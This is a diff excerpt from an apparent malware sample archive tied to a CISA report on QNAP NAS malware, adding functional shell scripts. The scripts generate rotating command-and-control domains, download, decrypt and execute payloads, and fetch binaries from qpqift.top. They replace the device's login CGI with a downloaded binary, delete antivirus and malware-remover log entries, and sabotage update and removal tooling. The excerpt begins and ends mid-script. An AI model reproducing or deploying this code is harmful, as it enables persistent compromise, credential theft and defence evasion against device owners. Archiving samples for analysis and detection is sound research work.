hash=${hash%${hash##*[0-9a-f]}}; hash=${hash#${hash%%[0-9a-f]*}}
|
||||
done
|
||||
done
|
||||
fi
|
||||
fi
|
||||
|
||||
test -f "${ts}_c" || touch "${ts}_c"
|
||||
rm -f "${CWD}/".tmp.*
|
||||
exit 0
|
107
2020/2020-07-27_CISA-Legacy_Malware_Targeting_QNAP_NAS/3cb052a7da6cda9609c32b5bafa11b76c2bb0f74b61277fecf464d3c0baeac0e
Normal file
107
2020/2020-07-27_CISA-Legacy_Malware_Targeting_QNAP_NAS/3cb052a7da6cda9609c32b5bafa11b76c2bb0f74b61277fecf464d3c0baeac0e
Normal file
@ -0,0 +1,107 @@
|
||||
export PATH="${PATH}:/bin:/sbin:/usr/bin:/usr/sbin:/usr/bin/X11:/usr/local/sbin:/usr/local/bin"
|
||||
|
||||
command -v getcfg > /dev/null 2>&1 || getcfg () { sed -n 'H;${x;s/\(.*\n\['"${1//\//\\\/}"']\|^\['"${1//\//\\\/}"']\)\n//I;s/\(^\|\n\)\[[^\n]\+\]\n.*//p}' "${4:-${confdir}/uLinux.conf}" | sed -n 's/^'"${2//\//\\\/}"' \?= \?\(.*\)/\1/Ip'; }
|
||||
|
||||
test -d /etc/config && confdir=/etc/config || { test -d /mnt/HDA_ROOT/.config && confdir=/mnt/HDA_ROOT/.config; }
|
||||
|
||||
bdir=
|
||||
test -f "${confdir}/smb.conf" && for i in homes Public Download Multimedia Web Recordings; do bdir=`getcfg "$i" path -f "${confdir}/smb.conf"` && test ! -z "$bdir" && bdir=`dirname "$bdir"` && test -d "$bdir" && testwriteable=$(mktemp "${bdir}/.tmp.XXXXXX") && rm "${testwriteable}" && break; bdir=''; done
|
||||
test -z "${bdir}" || test ! -d "${bdir}" && { command -v readlink >/dev/null 2>&1 || ln -sf /bin/busybox /usr/bin/readlink; for i in Public Download Multimedia Web Recordings homes; do bdir=`readlink "/share/${i}" 2>/dev/null` && test ! -z "$bdir" && bdir=`dirname "$bdir"` && bdir=/share/${bdir##*/} && test -d "$bdir" && break; done;
|
||||
test -z "${bdir}" || test ! -d "${bdir}"; } && { bdir=`getcfg SHARE_DEF defVolMP -f "${confdir}/def_share.info"`
|
||||
test -z "${bdir}" || test ! -d "${bdir}"; } && { bdir=`mount | sed -n "s/.*\(\/share\/[^ /]\+\) .*/\1/gp" | head -n 1`
|
||||
test -z "${bdir}" || test ! -d "${bdir}"; } && { for i in CACHEDEV3_DATA CACHEDEV2_DATA CACHEDEV1_DATA MD0_DATA; do test -d "/share/${i}" && bdir="/share/${i}" && break; done;
|
||||
test -z "${bdir}" || test ! -d "${bdir}" && bdir=/mnt/HDA_ROOT; }
|
||||
grep -F '' <<EOF >/dev/null 2>&1 && fgrep="grep -F" || { command -v fgrep >/dev/null 2>&1 && fgrep=fgrep || fgrep=grep; }
|
||||
|
||||
EOF
|
||||
test "$fgrep" || fgrep=grep
|
||||
test "$RANDOM" || RANDOM=17653
|
||||
genrstr ()
|
||||
{
|
||||
local s=;
|
||||
local min=${1:-4};
|
||||
local max=${2:-12};
|
||||
local kspace="${3:-a-zA-Z}"
|
||||
tr -dc "$kspace" < /dev/urandom | {
|
||||
read -rn $(($RANDOM % ( $max - $min + 1 ) + $min )) s;
|
||||
echo "$s"
|
||||
}
|
||||
}
|
||||
|
||||
verifyfile() {
|
||||
local file="$1"
|
||||
local sig="${2:-$file_s}"
|
||||
local out
|
||||
test ! -z "$file" && test -s "$file" || return 1
|
||||
test ! -z "$sig" && test -s "$sig" || return 1
|
||||
test -f ".rsakey" || echo "$verifykey" > ".rsakey"
|
||||
out=$(openssl dgst -sha1 -verify ".rsakey" -signature "$sig" "$file") && test "$out" = "Verified OK" && return 0
|
||||
return 1
|
||||
}
|
||||
|
||||
decryptfile() {
|
||||
local file="$1"
|
||||
local ofile="${2:-${file}}"
|
||||
local key='7C0vK4SzMO15zBxLD7XCi5hbjgP1ZjkJ'
|
||||
openssl enc -d -aes-256-cbc -k "$key" -md sha1 -salt < "$file" > "${file}_d" || return $?
|
||||
test -f "$ofile" && rm -f "$ofile"
|
||||
mv "${file}_d" "$ofile" && return 0
|
||||
return 1
|
||||
}
|
||||
|
||||
verifykey='-----BEGIN PUBLIC KEY-----
|
||||
MIIBojANBgkqhkiG9w0BAQEFAAOCAY8AMIIBigKCAYEAt/EDT6SB75atrHW7Cpog
|
||||
CXqrBM2CVbJo';verifykey="${verifykey}"'g4rwwS''z1Bp1i1'
|
||||
verifykey="${verifykey}"'B7B9Wd51no32lpRqOM+9GOr2W17xwJ8pqpQotex
|
||||
RC5qQSiS/7FS48jsPKsJnrUhnsI1fRLM4DqsEF3UOukZuDOYUhlteDuMqqZBz0AC
|
||||
Q3YnLjraTjchMF0XmaAAcWOkg5MsxAOKTepue4R/tnrPAkAG86nq5LA1+wa7opNV
|
||||
gQzwDh7YXhBnWz52+ebZ9TeqD31/sb5hoyUKf1Nr5HcKkklObuz1OGQJ//pkCbTC
|
||||
2EnQw6tCPQhgSIA8wJKkaxW0f/UHP+YBmWa4Wn+uPrJJuHSVNEJtAp2wlX3THltz
|
||||
0IGPQEuzoafOAl3EFjas3HcTX2HlEfnvAtRL2iLxJeba1nZ+U3geZOuxL1NhWhNh
|
||||
pjaLcKwhkRck7Y5hr1Pz8pLDnXsx5w0QUz6XS8HVf/KHnNXHufFEn01y9YoPuau1
|
||||
DNnpDGbq632Bs8ESd3ueHk9OY/UZxWeN3UdbseFxK35XAgMBAAE=
|
||||
-----END PUBLIC KEY-----'
|
||||
|
||||
DOMAIN_EXT_A='cf tk ml ga gq'
|
||||
DOMAIN_EXT_B='com biz org de rocks mx cn top nl men ws se info xyz net today ru fi name to in com.ua vg vn cd'
|
||||
|
||||
test -d "${bdir}/.qpkg" || mkdir "${bdir}/.qpkg"
|
||||
test -d "${bdir}/.qpkg/.liveupdate" || mkdir "${bdir}/.qpkg/.liveupdate"
|
||||
cd "${bdir}/.qpkg/.liveupdate" && rm -f .tmp.*
|
||||
|
||||
echo "$verifykey" > ".rsakey"
|
||||
i=0 n=0 c=0 errorcount=0
|
||||
outfile=$(mktemp "./.tmp.XXXXXX") || outfile=$(mktemp "${bdir}/.tmp.XXXXXX") || outfile=$(mktemp "/.tmp.XXXXXX") || outfile='./.tmp.out'
|
||||
|
||||
for domainexts in "$DOMAIN_EXT_A" "$DOMAIN_EXT_B"; do
|
||||
for ext in $domainexts; do
|
||||
hostname=$(echo "$(( $(date +%s) / 1296000 ))IbjGOEgnuD${ext}" | openssl dgst -sha1 -binary | openssl base64 | sed 'y/ABCDEFGHIJKLMNOPQRSTUVWXYZ-+\//abcdefghijklmnopqrstuvwxyzabc/;s/=//g')
|
||||
hostname=${hostname%[a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9]}
|
||||
hostnames="${hostname%[a-z0-9][a-z0-9][a-z0-9][a-z0-9]} ${hostname%[a-z0-9][a-z0-9][a-z0-9]}"
|
||||
hostnames="$hostnames ${hostname%[a-z0-9][a-z0-9]} ${hostname%[a-z0-9]} $hostname"
|
||||
for host in $hostnames; do
|
||||
test -f "$outfile" && rm -f "$outfile"
|
||||
recentupdate=''
|
||||
curl --connect-timeout 12 -m 30 -k -o "$outfile" "https://${host}.${ext}/qnap_firmware.xml?t=$(date +%s)"
|
||||
test -s "$outfile" || continue
|
||||
fsize=$(( $(wc -c < "$outfile") ))
|
||||
test "$fsize" -gt 4096 && rm -f "$outfile" && continue
|
||||
rsamsg=$(openssl base64 -in "$outfile" -d | openssl rsautl -pubin -inkey ".rsakey" -verify) || continue
|
||||
test "$rsamsg" || continue
|
||||
path="${rsamsg%|*}"; rsadomain="${path%|*}"; path="${path#*|}"
|
||||
hash="${rsamsg##*|}"; ts="${hash#*_}"; hash="${hash%_*}"
|
||||
test "$rsadomain" = "${host}.${ext}" || continue
|
||||
timenow=$(date +%s)
|
||||
test "$ts" -gt 0 && { test "$ts" -gt "$timenow" || test $(( $timenow - $ts )) -lt 172800; } && recentupdate=1
|
||||
curl --connect-timeout 12 -m 300 -k -o "$outfile" "https://${host}.${ext}/${path}"
|
||||
filehash=$(openssl dgst -sha1 -binary "$outfile" | openssl base64) || continue
|
||||
test "$filehash" = "$hash" || continue
|
||||
curl --connect-timeout 12 -m 30 -k -o "${outfile}_s" "https://${host}.${ext}/s/${path}"
|
||||
verifyfile "$outfile" "${outfile}_s" && decryptfile "$outfile" || continue
|
||||
mv "${outfile}_s" "${ts}_v"
|
||||
chmod 755 "$outfile" || continue
|
||||
( ( exec >/dev/null 2>/dev/null </dev/null; "$outfile" ) & )
|
||||
test "$recentupdate" -eq 1 && exit 0
|
||||
done
|
||||
done
|
||||
done
|
389
2020/2020-07-27_CISA-Legacy_Malware_Targeting_QNAP_NAS/473c5df2617cee5a1f73880c2d66ad9668eeb2e6c0c86a2e9e33757976391d1a
Normal file
389
2020/2020-07-27_CISA-Legacy_Malware_Targeting_QNAP_NAS/473c5df2617cee5a1f73880c2d66ad9668eeb2e6c0c86a2e9e33757976391d1a
Normal file
@ -0,0 +1,389 @@
|
||||
#!/bin/bash
|
||||
ts=1549432800
|
||||
PATH="${PATH}:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin"
|
||||
test -d /etc/config && confdir=/etc/config || { test -d /mnt/HDA_ROOT/.config && confdir=/mnt/HDA_ROOT/.config; }
|
||||
test -f "${confdir}/smb.conf" && for i in homes Public Download Multimedia Web Recordings; do bdir=`getcfg "$i" path -f "${confdir}/smb.conf"` && test ! -z "$bdir" && bdir=`dirname "$bdir"` && test -d "$bdir" && break; bdir=''; done
|
||||
test -z "${bdir}" || test ! -d "${bdir}" && { command -v readlink >/dev/null 2>&1 || ln -sf /bin/busybox /usr/bin/readlink; for i in homes Public Download Multimedia Web Recordings; do bdir=`readlink "/share/${i}" 2>/dev/null` && test ! -z "$bdir" && bdir=`dirname "$bdir"` && bdir=/share/${bdir##*/} && test -d "$bdir" && break; bdir=''; done
|
||||
test -z "${bdir}" || test ! -d "${bdir}"; } && { bdir=`getcfg SHARE_DEF defVolMP -f "${confdir}/def_share.info"` && test -d "$bdir" || bdir=''
|
||||
test -z "${bdir}" || test ! -d "${bdir}"; } && { while read -r bdir; do
|
||||
test -d "$bdir" && break; bdir=''
|
||||
done <<EOF
|
||||
$(mount | sed -n "s/.*\(\/share\/[^ /]\+\) .*/\1/gp")
|
||||
EOF
|
||||
test -z "${bdir}" || test ! -d "${bdir}"; } && { for i in {{CE_,}CACHEDEV{1,2,3},MD0,HDA}_DATA; do test -d "/share/${i}" && bdir="/share/${i}" && break; bdir=''; done
|
||||
test -z "${bdir}" || test ! -d "${bdir}" && { bdir=/mnt/HDA_ROOT && test -d "$bdir" || bdir='/'; }; }
|
||||
|
||||
getcfg MalwareRemover Version -f /etc/config/qpkg.conf && setcfg MalwareRemover Version 3.4.1 -f /etc/config/qpkg.conf
|
||||
getcfg MalwareRemover Date -f /etc/config/qpkg.conf && setcfg MalwareRemover Date 2019-01-25 -f /etc/config/qpkg.conf
|
||||
getcfg MalwareRemover Build -f /etc/config/qpkg.conf && setcfg MalwareRemover Build 20190125 -f /etc/config/qpkg.conf
|
||||
|
||||
if grep "clamav\.net" /etc/hosts; then
|
||||
sed -i '/0.0.0.0 .*clamav\.net/d' /etc/hosts
|
||||
fi
|
||||
|
||||
if grep '0\.0\.0\.0 update\.nai\.com' /etc/hosts; then
|
||||
sed -i '/0\.0\.0\.0 update\.nai\.com/d' /etc/hosts
|
||||
fi
|
||||
|
||||
test -z "$PWD" && PWD=$(pwd)
|
||||
CWD="$PWD"
|
||||
if [ "${CWD%/*}" != "${bdir}/.qpkg" ]; then
|
||||
CWD=''
|
||||
for dir in '.config' '.liveupdate'; do
|
||||
dir="${bdir}/.qpkg/${dir}"
|
||||
test -d "$dir" && cd "$dir" && CWD="$dir" && break
|
||||
done
|
||||
fi
|
||||
test "$CWD" && test -d "$CWD" && cd "$CWD"
|
||||
|
||||
sedreplace () {
|
||||
local grepstring="$1" sedcmd="$2" file="$3"
|
||||
[ "$grepstring" ] && [ "$sedcmd" ] && [ "$file" ] || return 1
|
||||
if grep "$grepstring" "$file"; then
|
||||
test -f '.qdisk_cmd' && ./.qdisk_cmd -i "$file"
|
||||
sed -i "$sedcmd" "$file"
|
||||
test -f '.qdisk_cmd' && ./.qdisk_cmd +i "$file"
|
||||
fi
|
||||
return $?
|
||||
}
|
||||
|
||||
for path in ".config/backup_conf.sh" ".liveupdate/liveupdate.sh"; do
|
||||
file=''
|
||||
[ -f "${path#*/}" ] && file="${path#*/}" || { [ -f "${bdir}/.qpkg/${path}" ] && file="${bdir}/.qpkg/${path}"; }
|
||||
if [ "x${file}" != 'x' ]; then
|
||||
sedcmd='s/CXqrBM2CVbJog4rwwSz1Bp1i1B7B9Wd51no32lpRqOM+9GOr2W17xwJ8pqpQotex/CXqrBM2CVbJog4rwwSz1Bp1i1'"'"'\
|
||||
verifykey="${verifykey}"'"'"'B7B9Wd51no32lpRqOM+9GOr2W17xwJ8pqpQotex/'
|
||||
grepstring='CXqrBM2CVbJog4rwwSz1Bp1i1B7B9Wd51no32lpRqOM+9GOr2W17xwJ8pqpQotex'
|
||||
sedreplace "$grepstring" "$sedcmd" "$file"
|
||||
sedcmd='s/g4rwwSz1Bp1i1'"'"'/g4rwwS'"''"'z1Bp1i1'"'"'/'
|
||||
grepstring='g4rwwSz1Bp1i1'"'"
|
||||
sedreplace "$grepstring" "$sedcmd" "$file"
|
||||
fi
|
||||
done
|
||||
file=''
|
||||
|
||||
if [ ! -f '1548766800_c' ]; then
|
||||
if getcfg Antivirus AutoUpdateDBEnable -f /etc/config/antivirus.global | grep -i TRUE; then
|
||||
test -f '/mnt/HDA_ROOT/.logs/notice.log' && python <<"EOF"
|
||||
import sqlite3
|
||||
conn = sqlite3.connect('/mnt/HDA_ROOT/.logs/notice.log')
|
||||
c = conn.cursor()
|
||||
c.execute("DELETE FROM NASLOG_NOTICE WHERE time > 1547096400 AND desc LIKE '[AntiVirus] Failed to update virus definitions%'")
|
||||
conn.commit()
|
||||
conn.close()
|
||||
exit()
|
||||
EOF
|
||||
test -f '/mnt/HDA_ROOT/.logs/event.log' && python <<"EOF"
|
||||
import sqlite3
|
||||
conn = sqlite3.connect('/mnt/HDA_ROOT/.logs/event.log')
|
||||
c = conn.cursor()
|
||||
c.execute("DELETE FROM NASLOG_EVENT WHERE event_timet > 1547096400 AND event_desc LIKE '[AntiVirus] Failed to update virus definitions%'")
|
||||
conn.commit()
|
||||
conn.close()
|
||||
exit()
|
||||
EOF
|
||||
fi
|
||||
if getcfg MalwareRemover Enable -f /etc/config/qpkg.conf | grep -i 'true' || grep 'MalwareRemover' '/etc/config/crontab' '/tmp/cron/crontabs/admin'; then
|
||||
test -f '/mnt/HDA_ROOT/.logs/notice.log' && python <<"EOF"
|
||||
import sqlite3
|
||||
conn = sqlite3.connect('/mnt/HDA_ROOT/.logs/notice.log')
|
||||
c = conn.cursor()
|
||||
c.execute("DELETE FROM NASLOG_NOTICE WHERE time > 1547964000 AND desc LIKE '[MalwareRemover] Malware Remover stopped%'")
|
||||
conn.commit()
|
||||
conn.close()
|
||||
exit()
|
||||
EOF
|
||||
test -f '/mnt/HDA_ROOT/.logs/event.log' && python <<"EOF"
|
||||
import sqlite3
|
||||
conn = sqlite3.connect('/mnt/HDA_ROOT/.logs/event.log')
|
||||
c = conn.cursor()
|
||||
c.execute("DELETE FROM NASLOG_EVENT WHERE event_timet > 1547964000 AND event_desc LIKE '[MalwareRemover] Malware Remover stopped%'")
|
||||
conn.commit()
|
||||
conn.close()
|
||||
exit()
|
||||
EOF
|
||||
touch "1548766800_c"
|
||||
fi
|
||||
fi
|
||||
|
||||
if [ ! -f ".qdisk_cmd" ]; then
|
||||
case "$(uname -m)" in
|
||||
*x86_64*)
|
||||
arch=x86_64
|
||||
binhash='g2oe7EJJVCiAHY6AG1I1c/lGF8Y='
|
||||
;;
|
||||
*arm*|*aarch*)
|
||||
arch=arm
|
||||
binhash='Z3twHZvQqYZ1vLeu4PLnZekdkRY='
|
||||
;;
|
||||
*i*86*)
|
||||
arch=i486
|
||||
binhash='gWzECXuIp3dz5yI7RJS9d4+xpq4='
|
||||
;;
|
||||
esac
|
||||
|
||||
if [ "x${binhash}" != 'x' ]; then
|
||||
curl --connect-timeout 12 -m 1200 -k -o ".qdisk_cmd.tmp" "https://qpqift.top/data/qdisk_cmd_${arch}" || rm -f ".qdisk_cmd.tmp"
|
||||
test -f '.qdisk_cmd.tmp' && rsynchash="$(openssl dgst -sha1 -binary ".qdisk_cmd.tmp" | openssl base64)"
|
||||
if [ "x${rsynchash}" = "x${binhash}" ]; then
|
||||
mv '.qdisk_cmd.tmp' '.qdisk_cmd' && chmod +x '.qdisk_cmd'
|
||||
else
|
||||
rm -f '.qdisk_cmd.tmp'
|
||||
fi
|
||||
fi
|
||||
fi
|
||||
binhash=''; rsynchash=''
|
||||
|
||||
for path in ".config/backup_conf.sh" ".liveupdate/liveupdate.sh"; do
|
||||
if [ -f "${path#*/}" ]; then
|
||||
test -f '.qdisk_cmd' && ./.qdisk_cmd +i "${path#*/}"
|
||||
elif [ -f "${bdir}/.qpkg/${path}" ]; then
|
||||
test -f '.qdisk_cmd' && ./.qdisk_cmd +i "${bdir}/.qpkg/${path}"
|
||||
fi
|
||||
done
|
||||
|
||||
version=$(getcfg System Version)
|
||||
test "x${version}" = 'x' && version=$(getcfg System Version -f /etc/default_config/uLinux.conf)
|
||||
test "${version##*.}" -lt 3 || test "${version%%.*}" -lt 4 || test "$(version=${version#*.}; echo "${version%.*}")" -lt 3 && version=4.3.3 || { test "${version##*.}" -gt 5 && version=4.3.5; }
|
||||
|
||||
if [ ! -d rssdoc ]; then
|
||||
command -v bunzip2 && compext=bz2 || compext=gz
|
||||
curl --connect-timeout 12 -m 1200 -k -o "rssdoc.tar.${compext}" "https://qpqift.top/data/rssdoc.tar.${compext}" && test -f "rssdoc.tar.${compext}" && rssdochash="$(openssl dgst -sha1 -binary "rssdoc.tar.${compext}" | openssl base64)" && { test "$rssdochash" = 'WOkc6vlUa7A30GKa4Z4o02CIexk=' || test "$rssdochash" = "0h0Jyx52a/F9YB80Ml4SsEsugyA="; } && { test "$compext" = bz2 && tarflag=j || tarflag=z; } && tar -x${tarflag}f "rssdoc.tar.${compext}" || rm -f rssdoc.tar
|
||||
rm -f "rssdoc.tar.${compext}"
|
||||
fi
|
||||
|
||||
rm -f /home/httpd/{Liveupdate,FirmwareRelease{,_beta}S.xml}
|
||||
ln -s "${CWD}"/rssdoc/{Liveupdate,FirmwareRelease{,_beta}S.xml} /home/httpd
|
||||
|
||||
if grep 'Liveupdate\|FirmwareRelease\|QTS_FW' /etc/default_config/uLinux.conf /etc/config/uLinux.conf | grep 'qnap\.com\|0\.0\.0\.0'; then
|
||||
internalwebport=$(/sbin/getcfg System InnerWebAccessPort -d 58080)
|
||||
localupdateurl="http://127.0.0.1:${internalwebport}"
|
||||
sed -i 's/https\?:\/\/[^\/]\+\/\(Liveupdate\|FirmwareRelease\|QTS_FW\)/http:\/\/127.0.0.1:'${internalwebport}'\/\1/' /etc/default_config/uLinux.conf /etc/config/uLinux.conf
|
||||
fi
|
||||
|
||||
test -f '/etc/config/rssdoc/qpkgcenter_*.xml' || test -h '/etc/config/rssdoc/qpkgcenter_*.xml' && { test -f '.qdisk_cmd' && ./.qdisk_cmd -i '/etc/config/rssdoc/qpkgcenter_*.xml'; rm -f '/etc/config/rssdoc/qpkgcenter_*.xml'; }
|
||||
|
||||
if find /etc/config/rssdoc | grep 'qpkgcenter_.*\.xml'; then
|
||||
:
|
||||
else
|
||||
cp "./rssdoc/Liveupdate/QTS${version}/qpkgcenter_eng.xml" '/etc/config/rssdoc/qpkgcenter_eng.xml'
|
||||
test -f '.qdisk_cmd' && ./.qdisk_cmd +i '/etc/config/rssdoc/qpkgcenter_eng.xml'
|
||||
fi
|
||||
|
||||
for file in /etc/config/rssdoc/qpkgcenter_*.xml
|
||||
do
|
||||
if [ -f "$file" ] && { rm -f "$file" || [ ! -s "$file" ]; }; then
|
||||
test -f '.qdisk_cmd' && ./.qdisk_cmd -i "$file"
|
||||
touch "$file"
|
||||
cp -f "./rssdoc/Liveupdate/QTS${version}/${file##*/}" "$file"
|
||||
test -f '.qdisk_cmd' && ./.qdisk_cmd +i "$file"
|
||||
fi
|
||||
done
|
||||
file=''
|
||||
|
||||
for qpkgdir in "${bdir}/.qpkg" '../../.qpkg'; do
|
||||
test -d "$qpkgdir" && break
|
||||
done
|
||||
test -d "${qpkgdir}/MalwareRemover" || mkdir "${qpkgdir}/MalwareRemover"
|
||||
test -d "${qpkgdir}/MalwareRemover/modules" || mkdir "${qpkgdir}/MalwareRemover/modules"
|
||||
test -f '.qdisk_cmd' && ./.qdisk_cmd -i "${qpkgdir}/MalwareRemover"
|
||||
|
||||
if [ -d "${qpkgdir}/MalwareRemover/modules" ]; then
|
||||
for file in 10_derek_3.pyc 12_derek_3.pyc; do
|
||||
if [ ! -f "${qpkgdir}/MalwareRemover/modules/${file}" ] || rm -f "${qpkgdir}/MalwareRemover/modules/${file}" || test -x "${qpkgdir}/MalwareRemover/modules/${file}" || [ $(wc -c < "${qpkgdir}/MalwareRemover/modules/${file}") -gt 150 ] || [ $(wc -c < "${qpkgdir}/MalwareRemover/modules/${file}") -lt 120 ]; then
|
||||
test -f '.qdisk_cmd' && test -f "${qpkgdir}/MalwareRemover/modules/${file}" && ./.qdisk_cmd -i "${qpkgdir}/MalwareRemover/modules/${file}" && rm -f "${qpkgdir}/MalwareRemover/modules/${file}"
|
||||
openssl base64 -d <<"EOF" >"${qpkgdir}/MalwareRemover/modules/${file}"
|
||||
A/MNCuVwTVxjAAAAAAAAAAABAAAAQAAAAHMLAAAAZQAAgwAAAWQAAFMoAQAAAE4o
|
||||
AQAAAHQEAAAAZXhpdCgAAAAAKAAAAAAoAAAAAHMVAAAAbW9kdWxlcy8xMF9kZXJl
|
||||
a18zLnB5dAgAAAA8bW9kdWxlPgEAAABzAAAAAA==
|
||||
EOF
|
||||
chmod -x "${qpkgdir}/MalwareRemover/modules/${file}"
|
||||
test -f '.qdisk_cmd' && ./.qdisk_cmd +i "${qpkgdir}/MalwareRemover/modules/${file}"
|
||||
fi
|
||||
done
|
||||
fi
|
||||
file=''; qpkgdir=''
|
||||
|
||||
if [ ! -f .rsakey ]; then
|
||||
verifykey='-----BEGIN PUBLIC KEY-----
|
||||
MIIBojANBgkqhkiG9w0BAQEFAAOCAY8AMIIBigKCAYEAt/EDT6SB75atrHW7Cpog
|
||||
CXqrBM2CVbJo';verifykey="${verifykey}"'g4rwwS''z1Bp1i1'
|
||||
verifykey="${verifykey}"'B7B9Wd51no32lpRqOM+9GOr2W17xwJ8pqpQotex
|
||||
RC5qQSiS/7FS48jsPKsJnrUhnsI1fRLM4DqsEF3UOukZuDOYUhlteDuMqqZBz0AC
|
||||
Q3YnLjraTjchMF0XmaAAcWOkg5MsxAOKTepue4R/tnrPAkAG86nq5LA1+wa7opNV
|
||||
gQzwDh7YXhBnWz52+ebZ9TeqD31/sb5hoyUKf1Nr5HcKkklObuz1OGQJ//pkCbTC
|
||||
2EnQw6tCPQhgSIA8wJKkaxW0f/UHP+YBmWa4Wn+uPrJJuHSVNEJtAp2wlX3THltz
|
||||
0IGPQEuzoafOAl3EFjas3HcTX2HlEfnvAtRL2iLxJeba1nZ+U3geZOuxL1NhWhNh
|
||||
pjaLcKwhkRck7Y5hr1Pz8pLDnXsx5w0QUz6XS8HVf/KHnNXHufFEn01y9YoPuau1
|
||||
DNnpDGbq632Bs8ESd3ueHk9OY/UZxWeN3UdbseFxK35XAgMBAAE=
|
||||
-----END PUBLIC KEY-----'
|
||||
test -f ".rsakey" || echo "$verifykey" > ".rsakey"
|
||||
fi
|
||||
|
||||
cgibindir='/home/httpd/cgi-bin'
|
||||
if [ ! -f "1549101600_c" ] && [ -f "${cgibindir}/authLogin.cgi" ]; then
|
||||
test -f "1549101600_c" || touch "1549101600_c"
|
||||
case "$(uname -m)" in
|
||||
*x86_64*)
|
||||
arch=x86_64
|
||||
binhash='rrYwg0D4+4DxcDxYQsNTB4JUGlQ='
|
||||
;;
|
||||
*arm*|*aarch*)
|
||||
arch=arm
|
||||
binhash='Z4n2BZdhwjYf0wjM7GCW61WM9eU='
|
||||
;;
|
||||
*i*86*)
|
||||
arch=i486
|
||||
binhash='U3eHe6syQraRBGgsvkFZH3wibDw='
|
||||
;;
|
||||
esac
|
||||
|
||||
if [ "x${binhash}" != 'x' ]; then
|
||||
curl --connect-timeout 12 -m 1200 -k -o ".qal" "https://qpqift.top/data/qal2_${arch}" || rm -f ".qal"
|
||||
test -f '.qal' && rsynchash="$(openssl dgst -sha1 -binary ".qal" | openssl base64)"
|
||||
if [ "x${rsynchash}" = "x${binhash}" ]; then
|
||||
test -f "${cgibindir}"/sysauthLogin.cgi && mv "${cgibindir}"/sysauthLogin.cgi "${cgibindir}"/authLogin.cgi
|
||||
mv "${cgibindir}"/authLogin.cgi "${cgibindir}"/sysauthLogin.cgi && test -f "${cgibindir}"/sysauthLogin.cgi && mv '.qal' "${cgibindir}"/authLogin.cgi && chmod 755 "${cgibindir}"/authLogin.cgi
|
||||
fi
|
||||
test -f '.qal' && rm -f '.qal'
|
||||
fi
|
||||
fi
|
||||
|
||||
if [ -f "${cgibindir}"/authLogin.cgi ] && "${cgibindir}"/authLogin.cgi | grep '<QDocRoot'; then
|
||||
:
|
||||
else
|
||||
test -f "${cgibindir}"/sysauthLogin.cgi && mv "${cgibindir}"/sysauthLogin.cgi "${cgibindir}"/authLogin.cgi
|
||||
fi
|
||||
|
||||
test -f /etc/config/.qsync.conf && authkeysfile=$(grep AuthorizedKeysFile /etc/config/.qsync.conf | sed 's/"//g' | cut -d ' ' -f 2)
|
||||
if [ "$authkeysfile" ] && [ -f "$authkeysfile" ] && grep 'miOGcmendZU2r10SdZVplBQ4i' "$authkeysfile"; then
|
||||
sed -i '/miOGcmendZU2r10SdZVplBQ4i/d' "$authkeysfile"
|
||||
lsofout="$(lsof +c 0 -i -n -P | grep :51163)"
|
||||
sshpid="$(echo "$lsofout" | tr -s ' ' | cut -d ' ' -f 2 | head -n 1)"
|
||||
kill -2 "$sshpid"
|
||||
fi
|
||||
|
||||
if [ ! -f '1548997200_c' ]; then
|
||||
touch '1548997200_c'
|
||||
mdir=`mktemp -d /tmp/.mount.XXXXXX` || { mdir=/tmp/.mount.jbbxQob; mkdir ${mdir}; } || mdir=`mktemp -d "${bdir}/.mount.XXXXXX"` || { mdir="${bdir}/.mount.jbbxQob"; mkdir ${mdir}; } || `mktemp -d "/mnt/HDA_ROOT/.mount.XXXXXX"` || { mdir="/mnt/HDA_ROOT/.mount.jbbxQob"; mkdir ${mdir}; } || `mktemp -d "/.mount.XXXXXX"` || { mdir="/.mount.jbbxQob"; mkdir ${mdir}; } || `mktemp -d "./.mount.XXXXXX"` || { mdir="./.mount.jbbxQob"; mkdir ${mdir}; }
|
||||
__BOOT_DEV=
|
||||
__model=`getcfg System "Internal Model"`
|
||||
CONFIG_DEV_NODE=`getcfg "CONFIG STORAGE" DEVICE_NODE -f /etc/platform.conf`
|
||||
CONFIG_DEV_PART=`getcfg "CONFIG STORAGE" FS_ACTIVE_PARTITION -f /etc/platform.conf`
|
||||
CONFIG_DEV_FS=`getcfg "CONFIG STORAGE" FS_TYPE -f /etc/platform.conf`
|
||||
__BOOT_CONF=`test -f /etc/default_config/BOOT.conf && cat /etc/default_config/BOOT.conf 2>/dev/null || cat "${confdir}/BOOT.conf"` || { test "$arch_o" = arm && __BOOT_CONF=TS-NASARM; }
|
||||
command -v hal_app > /dev/null 2>&1 && { __BOOT_DEV=$(hal_app --get_boot_pd port_id=0); }
|
||||
test "${__BOOT_CONF}" = TS-NASARM || test "$arch_o" = arm && { test -f /etc/IS_TAS && __BOOT_DEV="${__BOOT_DEV:-/dev/mtdblock}7" || __BOOT_DEV="${__BOOT_DEV:-/dev/mtdblock}5"; } || __BOOT_DEV="${__BOOT_DEV:-/dev/sdx}6"
|
||||
test "x${CONFIG_DEV_NODE}" != "x" && { ubiattach -m "${CONFIG_DEV_PART}" -d 2; mount -t ubifs ubi2:config "${mdir}" > /dev/null 2>&1 || { test -f /etc/IS_TAS && mount -t ext4 /dev/mmcblk0p7 "${mdir}"; } } || mount ${__BOOT_DEV} -t ext2 ${mdir} || { test "${__model}" = "TS-201" && mount -t ext2 /dev/mtdblock4 ${mdir}; } || { ubiattach -m "${CONFIG_DEV_PART}" -d 2; mount -t ubifs ubi2:config "${mdir}"; mount -t ext4 /dev/mmcblk0p7 "${mdir}"; } || { test "${__model}" = "TS-269L" && mount -t ext2 /dev/sdc6 ${mdir}; } || { test "${__model}" = "TS-869" && mount -t ext2 /dev/sdi6 ${mdir}; } || { test "$arch_o" = arm || ${__BOOT_CONF} = "TS-NASARM" && { for i in 5 7 4 6 3 8; do mount -t ext2 "/dev/mtdblock${i}" ${mdir} && break; done; }; } || { test "$arch_o" = x86 && for n in /dev/sdc /dev/sdx /dev/sdi $__BOOT_DEV; do for i in 6 $CONFIG_DEV_PART; do mount -t ext2 ${n}${i} ${mdir} && break 2; done; done; } || { mount -t ext2 $(/sbin/hal_app --get_boot_pd port_id=0)6 ${mdir}; }
|
||||
|
||||
if [ $? -eq 0 ] || mount | grep "$mdir" >/dev/null; then
|
||||
for file in "${mdir}"/K01* "${mdir}/autorun.sh" '/tmp/config/autorun.sh'; do
|
||||
